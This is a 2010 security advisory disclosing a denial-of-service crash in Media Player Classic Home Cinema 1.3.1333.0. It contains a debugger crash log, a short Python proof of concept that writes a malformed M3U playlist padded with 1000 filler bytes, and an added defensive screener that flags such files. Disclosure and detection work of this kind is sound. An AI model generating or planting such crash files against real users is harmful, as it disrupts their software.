Media Player Classic Heap Overflow/DoS Vulnerability
Source: http://darshanams.blogspot.com  Author: Darshanam  Published: 2010-07-27

Tested on:
Media Player Classic - Home Cinema
Build number: 1.3.1333.0
MPC Compiler: VS 2008
FFmpeg Compiler: GCC 4.4.1


###################CRASH REPORT START##################
ModLoad: 77be0000 77bf5000   C:\WINDOWS\system32\MSACM32.dll
ModLoad: 77bd0000 77bd7000   C:\WINDOWS\system32\midimap.dll
ModLoad: 73ee0000 73ee4000   C:\WINDOWS\system32\KsUser.dll
ModLoad: 10000000 100fb000   C:\Program Files\K-Lite Codec Pack\Filters\vsfilter.dll
ModLoad: 590b0000 590ce000   C:\WINDOWS\system32\wmpasf.dll
ModLoad: 71b20000 71b32000   C:\WINDOWS\system32\MPR.dll
ModLoad: 6bf50000 6bfcd000   C:\WINDOWS\system32\dxmasf.dll
ModLoad: 02530000 0257f000   C:\WINDOWS\system32\DRMClien.DLL
(6dc.cec): C++ EH exception - code e06d7363 (!!! second chance !!!)
............................... ISSUE
eax=01c2f2e4 ebx=80040218 ecx=00000000 edx=00200003 esi=01c2f36c edi=003fd08c
eip=7c812aeb esp=01c2f2e0 ebp=01c2f334 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\WINDOWS\system32\kernel32.dll -
kernel32!RaiseException+0x52:
7c812aeb 5e              pop     esi
Missing image name, possible paged-out or corrupt data.
Missing image name, possible paged-out or corrupt data.
Missing image name, possible paged-out or corrupt data.
0:004> g
WARNING: Continuing a non-continuable exception
(6dc.cec): Break instruction exception - code 80000003 (first chance)
eax=01c2f2e4 ebx=80040218 ecx=00000000 edx=00200003 esi=00000000 edi=003fd08c
eip=0071d14b esp=01c2f37c ebp=01c2f39c iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
mpc_hc+0x31d14b:
0071d14b cc              int     3

###################CRASH REPORT END##################

For images related to the vulnerability, refer to my blog:
http://darshanams.blogspot.com

##########PoC Start################
print("\n*****Program need to be run on Python 3.1*****")
print ("""Media Player Classic - Home Cinema 1.3.1333.0 M3U File DoS
(0-Day)\r\n\r\nTested on:\nWindows XP SP3\n
Media Player Classic - Home Cinema\n\t\t Build number: 1.3.1333.0\n\t\t
MPC Compiler: VS 2008\n\t\t FFmpeg Compiler: GCC 4.4.1\n""")

head = "EXTM3U"
buf = "D" * 1000

mal_buf = head + buf
#print ("mal_buf:",mal_buf)
try:
    # Write the test playlist; 'with' closes the file even if the write fails
    with open("mpc_m3u_crash.m3u", 'w') as mpc_mal:
        mpc_mal.write(mal_buf)
    print ("File Created Successfully: mpc_m3u_crash.m3u\n")
except OSError:
    print ("Cannot Create M3U File\n")

print ("[+] Found and Coded by: Praveen Darshanam\r\n")
##########PoC End################

Best Regards,
Praveen Darshanam,
Security Researcher
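
For defenders, a playlist pre-screen that flags the traits of the file produced above (an "EXTM3U" header with no leading '#', one very long line, a long run of a single byte). This is an added example, not part of the original advisory or of MPC-HC; the function names and both thresholds are assumptions, and the sample inputs are constructed.

```python
import re

MAX_LINE = 512        # assumed ceiling for one playlist line; not an MPC-HC limit
MIN_FILLER_RUN = 64   # assumed length at which a repeated byte counts as filler

# One byte followed by at least MIN_FILLER_RUN - 1 copies of itself.
_FILLER = re.compile(rb"(.)\1{%d,}" % (MIN_FILLER_RUN - 1), re.DOTALL)


def screen_m3u_bytes(data, max_line=MAX_LINE):
    """Return a list of findings for raw playlist bytes; [] means nothing flagged."""
    findings = []
    if data.startswith(b"\xef\xbb\xbf"):      # tolerate a UTF-8 byte-order mark
        data = data[3:]
    lines = data.splitlines()
    if not lines:
        return ["empty playlist"]
    # Extended M3U begins with "#EXTM3U"; plain M3U has no header line at all.
    # A first line starting with "EXTM3U" (no '#') matches neither form.
    if lines[0].lstrip().upper().startswith(b"EXTM3U"):
        findings.append("line 1: 'EXTM3U' header without leading '#'")
    for number, line in enumerate(lines, start=1):
        if len(line) > max_line:
            findings.append("line %d: %d bytes exceeds limit %d"
                            % (number, len(line), max_line))
        run = _FILLER.search(line)
        if run:
            findings.append("line %d: byte 0x%02x repeated %d times"
                            % (number, run.group(1)[0], len(run.group(0))))
    return findings


def screen_m3u(path, max_line=MAX_LINE):
    """Screen a playlist on disk, e.g. before it is handed to a media player."""
    with open(path, "rb") as fh:
        return screen_m3u_bytes(fh.read(), max_line)


# Constructed samples: a normal extended playlist, and the shape the PoC writes.
SAMPLE_OK = b"#EXTM3U\r\n#EXTINF:215,Artist - Title\r\nmusic\\track01.mp3\r\n"
SAMPLE_BAD = b"EXTM3U" + b"D" * 1000

if __name__ == "__main__":
    for name, blob in (("ok", SAMPLE_OK), ("bad", SAMPLE_BAD)):
        print(name, screen_m3u_bytes(blob))
```

The checks are heuristics for mail or download gateways and for triage of user-reported crashes; they do not depend on the root cause of the crash, which the advisory does not identify.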


 